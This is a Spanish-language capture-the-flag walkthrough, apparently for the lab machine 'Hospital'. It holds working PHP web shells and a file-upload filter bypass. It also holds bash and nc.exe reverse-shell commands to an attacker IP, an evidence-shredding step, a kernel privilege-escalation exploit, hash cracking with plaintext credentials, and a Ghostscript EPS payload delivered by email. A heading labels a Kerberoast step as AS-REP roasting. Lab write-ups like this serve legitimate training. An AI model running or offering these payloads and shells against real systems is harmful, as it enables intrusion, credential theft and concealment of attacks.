Hospital

Escaneo inicial:

       │ File: targeted
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ # Nmap 7.95 scan initiated Tue Jun 10 00:13:55 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p 22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,3389,5985,6404,6406,6407,
       │ 6409,6613,6633,8080,9389,18622 -oN targeted 10.10.11.241
   2   │ Nmap scan report for 10.10.11.241
   3   │ Host is up (0.16s latency).
   4   │ 
   5   │ PORT      STATE SERVICE           VERSION
   6   │ 22/tcp    open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
   7   │ | ssh-hostkey: 
   8   │ |   256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
   9   │ |_  256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
  10   │ 53/tcp    open  domain            Simple DNS Plus
  11   │ 88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-06-10 07:14:04Z)
  12   │ 135/tcp   open  msrpc             Microsoft Windows RPC
  13   │ 139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
  14   │ 389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
  15   │ | ssl-cert: Subject: commonName=DC
  16   │ | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
  17   │ | Not valid before: 2023-09-06T10:49:03
  18   │ |_Not valid after:  2028-09-06T10:49:03
  19   │ 443/tcp   open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
  20   │ |_http-title: Hospital Webmail :: Welcome to Hospital Webmail
  21   │ |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
  22   │ | tls-alpn: 
  23   │ |_  http/1.1
  24   │ | ssl-cert: Subject: commonName=localhost
  25   │ | Not valid before: 2009-11-10T23:48:47
  26   │ |_Not valid after:  2019-11-08T23:48:47
  27   │ |_ssl-date: TLS randomness does not represent time
  28   │ 445/tcp   open  microsoft-ds?
  29   │ 464/tcp   open  kpasswd5?
  30   │ 593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
  31   │ 636/tcp   open  ldapssl?
  32   │ | ssl-cert: Subject: commonName=DC
  33   │ | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
  34   │ | Not valid before: 2023-09-06T10:49:03
  35   │ |_Not valid after:  2028-09-06T10:49:03
  36   │ 1801/tcp  open  msmq?
  37   │ 2103/tcp  open  msrpc             Microsoft Windows RPC
  38   │ 2105/tcp  open  msrpc             Microsoft Windows RPC
  39   │ 2107/tcp  open  msrpc             Microsoft Windows RPC
  40   │ 2179/tcp  open  vmrdp?
  41   │ 3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
  42   │ | ssl-cert: Subject: commonName=DC
  43   │ | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
  44   │ | Not valid before: 2023-09-06T10:49:03
  45   │ |_Not valid after:  2028-09-06T10:49:03
  46   │ 3269/tcp  open  globalcatLDAPssl?
  47   │ | ssl-cert: Subject: commonName=DC
  48   │ | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
  49   │ | Not valid before: 2023-09-06T10:49:03
  50   │ |_Not valid after:  2028-09-06T10:49:03
  51   │ 3389/tcp  open  ms-wbt-server     Microsoft Terminal Services
  52   │ | ssl-cert: Subject: commonName=DC.hospital.htb
  53   │ | Not valid before: 2025-06-08T17:01:32
  54   │ |_Not valid after:  2025-12-08T17:01:32
  55   │ | rdp-ntlm-info: 
  56   │ |   Target_Name: HOSPITAL
  57   │ |   NetBIOS_Domain_Name: HOSPITAL
  58   │ |   NetBIOS_Computer_Name: DC
  59   │ |   DNS_Domain_Name: hospital.htb
  60   │ |   DNS_Computer_Name: DC.hospital.htb
  61   │ |   DNS_Tree_Name: hospital.htb
  62   │ |   Product_Version: 10.0.17763
  63   │ |_  System_Time: 2025-06-10T07:15:04+00:00
  64   │ 5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  65   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  66   │ |_http-title: Not Found
  67   │ 6404/tcp  open  msrpc             Microsoft Windows RPC
  68   │ 6406/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
  69   │ 6407/tcp  open  msrpc             Microsoft Windows RPC
  70   │ 6409/tcp  open  msrpc             Microsoft Windows RPC
  71   │ 6613/tcp  open  msrpc             Microsoft Windows RPC
  72   │ 6633/tcp  open  msrpc             Microsoft Windows RPC
  73   │ 8080/tcp  open  http              Apache httpd 2.4.55 ((Ubuntu))
  74   │ | http-title: Login
  75   │ |_Requested resource was login.php
  76   │ | http-cookie-flags: 
  77   │ |   /: 
  78   │ |     PHPSESSID: 
  79   │ |_      httponly flag not set
  80   │ 9389/tcp  open  mc-nmf            .NET Message Framing
  81   │ 18622/tcp open  msrpc             Microsoft Windows RPC
  82   │ Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
  83   │ 
  84   │ Host script results:
  85   │ | smb2-time: 
  86   │ |   date: 2025-06-10T07:15:07
  87   │ |_  start_date: N/A
  88   │ |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
  89   │ | smb2-security-mode: 
  90   │ |   3:1:1: 
  91   │ |_    Message signing enabled and required
  92   │ 
  93   │ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  94   │ # Nmap done at Tue Jun 10 00:16:08 2025 -- 1 IP address (1 host up) scanned in 133.70 seconds

Grepeamos por http para ver que serviciso de web tenemos corriendo:

cat targeted -l java | grep "http"

Viendo una web:

Investigando de que trata esta aplicacion encontramos lo siguiente:

Roundcube

Roundcube es un cliente de correo para ver los mensajes de correo a través de una página web, pudiendo acceder desde cualquier navegador con acceso a internet. Desde él es posible realizar todas las operaciones necesarias para gestionar los correos e incluso usarlo como agenda de contactos y calendario.

Por el puerto 8080 que es otra web entramos a ver que contiene:

Creamos una cuenta:

Al ingresar nos pide que subamos un archivo pero no sabemos que extensiones son validas para ello usamos Burp Suite:

Burp Suite - File Upload - Extensiones

Cuando intentamos subir cualquier archivo a una aplicación web usando Burp Suite, podemos notar que algunos archivos no son aceptados debido a las restricciones de la aplicación. A continuación, exploraremos cómo manejar los archivos de carga en Burp Suite, enfocándonos en las extensiones de archivo y cómo podemos determinar cuáles son válidas o no.

Paso 1: Subida de Archivos y Redirección al Error

Al intentar subir un archivo con la extensión .php, la aplicación no lo acepta y redirige al siguiente enlace de error:

Al tener una externsion .php no lo acepta y nos redirige a LOCATION: failed.php
para ver que estension son validas lo mandairesmoa al intrider agreando las extensiones y despues

grep extract le damos al add para q nos interesa una columna donde no srespoerende el failed.php el cmapo location q nos vale si ese campo es susces o failes por ahi filtraremsos

paso 2: Análisis de Respuestas con grep y extract

Una vez que tenemos las respuestas de los intentos de carga, utilizamos grep para filtrar las respuestas y extraer la información relevante. Nos interesa específicamente el campo Location en las cabeceras HTTP, que nos indicará si la carga fue exitosa o fallida:

Si la respuesta es "failed.php", significa que la carga del archivo ha fallado.
Si la respuesta no es "failed.php", significa que la carga fue exitosa.

Como resultado:

Primero, al ejecutar el comando con feroxbuster, estás buscando rutas o directorios potenciales donde podrías intentar subir archivos. Esto es útil para identificar directorios o scripts que podrían permitirte cargar archivos.

feroxbuster -u http://hospital.htb:8080/ -w /usr/share/wordlists/dirb/common.txt

Probaremos si podemos subirle un archivo de prueba con phps:

<?php
echo "Hola Perú";
?>

Pero no se puede con esa extension por mas no salga sucesfull!

Subida de archivos `.phar`:

Crea un archivo PHP (por ejemplo, neuvo.phar) que contenga el código deseado:

RCE FOR PHP

Configuramos el codigo para un RCE:

Uso de shell_exec():

<?php
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>

Uso de system():

<?php
echo "<pre>" . system($_GET['cmd']) . "</pre>";
?>

Configuración actual de PHP en el servidor:

<?php
phpinfo();
?>

Al probar estas vulnerabilidades de RCE, ejecutaremos el script phpinfo() para obtener información del sistema, ya que los comandos system() y shell_exec() no están funcionando. Es probable que estas funciones estén deshabilitadas en la configuración del servidor para evitar la ejecución remota de comandos.

Lo ejecutamos:

RCE - EXPLOIT

<?php
$dangerous_functions = array("exec", "passthru", "system", "shell_exec", "popen", "proc_open", "pcntl_exec");

foreach ($dangerous_functions as $f){
    if (function_exists($f)){
        echo "\n[+] " . $f . " - EXISTE";
    }
}
?>

Resultado:

Podemos ejecutar comandos con la funcionalidad de popen:

Y funcionó señores:

Bash Shell

bash -c "bash -i >%26 /dev/tcp/10.10.16.3/443 0>%261"

Tenemos ejecución remota de comandos como www-data:

Técnica de eliminación

Una vez adentro en uploads eliminamos el archivo definitivamente para que ni con técnicas forenses se pueda recuperar:

shred -zun 50 -v cmd.phar

Miraremos los archivos de configuración:

MySQL - Config

Conexión a la base de datos utilizando las credenciales obtenidas:

mysql -uroot -p'my$qls3rv1c3!' -e "SHOW DATABASES;"
mysql -uroot -p'my$qls3rv1c3!' -e "USE hospital; SHOW TABLES;"
mysql -uroot -p'my$qls3rv1c3!' -e "SELECT * FROM hospital.users;"

Se encontró un hash de admin:

Crackeando el hash de admin:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Pero no se obtuvo nada al respecto.

Versión del Kernel 5.19.0-35-generic

Exploit Encontrado para las Vulnerabilidades CVE-2023-2640 y CVE-2023-32629

CVE-2023-2640-CVE-2023-32629/exploit.sh at main · g1vi/CVE-2023-2640-CVE-2023-32629GitHub

# Ejecutar el script del exploit
chmod +x exploit.sh
./exploit.sh

Subimos nuestros privilegios:

En el /etc/shadow se encontraron hashes:

Intentamos crakearlos: el $6$ es un SHA-512 modo 1800:

 hashcat -a 0 -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt -O

Con esa contraseña podemos ingresar por ssh pero es lo mismo que estuvismos en antes asi que buscamos en otro lado:

Como miramos en el escaneo se observo otro puerto http por el puerto 443

Podemos ingresar con el usuario de drwilliams y contraseña qwe123!@#

Validaremos si el usuario es valido con netexec :

netexec smb 10.10.11.241 -u "drwilliams" -p 'qwe123!@#' --shares

Enumeramos usuarios por rpcclient :

rpcclient -U 'drwilliams%qwe123!@#' 10.10.11.241

AS-REP Roasting - Con credenciales

impacket-GetUserSPNs 'hospital.htb/drwilliams:qwe123!@#'

impacket-GetUserSPNs: Es una herramienta de la suite Impacket, que permite interactuar con Active Directory (AD) y obtener información, como los SPNs.
hospital.htb: El nombre del dominio o de la red que se está atacando.
drwilliams:qwe123!@#: Especifica el usuario drwilliams y la contraseña qwe123!@# para autenticarse en el dominio.

Sigamos según la pagina web:

Debemos crear un archivo en formato .eps de manera que, al ser abierto por otra persona, ejecute un código. En este caso, crearemos una reverse shell incrustando un código malicioso que nos permitirá interactuar con la máquina de forma remota

GitHub - jakabakos/CVE-2023-36664-Ghostscript-command-injection: Ghostscript command injection vulnerability PoC (CVE-2023-36664)GitHub

Ejecutaremos el siguiente script:

Nos pide un payload lo cual le bridamos el nuestro:

Le enviamos por mensaje:

Lo cual recibimos la conexión:

SUBIR PRIVILEGIOS

icacls  htdocs

Usuarios tiene permisos de lectura, ejecución y escritura sobre la carpeta htdocs. Este es un riesgo si alguien obtiene acceso a la cuenta de usuario estándar en el sistema, ya que podrían modificar archivos web importantes.

Creamos nuestro archivo para ejecutar comandos:

Y al pasarlo a la maquina victima se vio lo siguiente:

En este punto ya podemos ejecutar comandos:

netcat - nc.exe

https://hospital.htb/malici.php?cmd=C:\\Temp\\binary\\nc64.exe -e cmd 10.10.16.3 443

Releases · rahuldottech/netcat-for-windowsGitHub

WHOAMI

PreviousTombWatcher NextHaze

Last updated 8 months ago

hashtagRoundcube

hashtagBurp Suite - File Upload - Extensiones

hashtagPaso 1: Subida de Archivos y Redirección al Error

hashtagSubida de archivos .phar:

hashtagRCE FOR PHP

hashtagRCE - EXPLOIT

hashtagBash Shell

hashtagTécnica de eliminación

hashtagMySQL - Config

hashtagVersión del Kernel 5.19.0-35-generic

hashtagAS-REP Roasting - Con credenciales

hashtagSUBIR PRIVILEGIOS

hashtagnetcat - nc.exe